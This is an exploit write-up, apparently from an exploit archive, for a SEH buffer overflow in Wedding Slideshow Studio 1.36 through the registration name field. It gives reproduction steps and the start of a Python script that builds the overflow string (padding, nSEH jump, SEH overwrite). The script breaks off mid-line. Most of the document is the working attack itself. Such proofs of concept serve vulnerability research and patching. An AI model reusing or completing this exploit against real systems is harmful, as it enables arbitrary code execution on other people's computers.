#Exploit Title: Wedding Slideshow Studio 1.36 - 'Name' Buffer Overflow #Exploit Author : ZwX #Exploit Date: 2020-02-10 #Vendor Homepage : http://www.wedding-slideshow-studio.com/ #Tested on OS: Windows 10 v1803 #Social: twitter.com/ZwX2a ## Steps to Reproduce: ## #1. Run the python exploit script, it will create a new file with the name "name.txt". #2. Just copy the text inside "name.txt". #3. Start the program. In the new window click "Help" > "Register ... #4. Now paste the content of "name.txt" into the field: "Registration Name" > Click "Ok" #5. The calculator runs successfully #!/usr/bin/python from struct import pack buffer = "\x41" * 256 nseh = "\xeb\x06\xff\xff" seh = pack("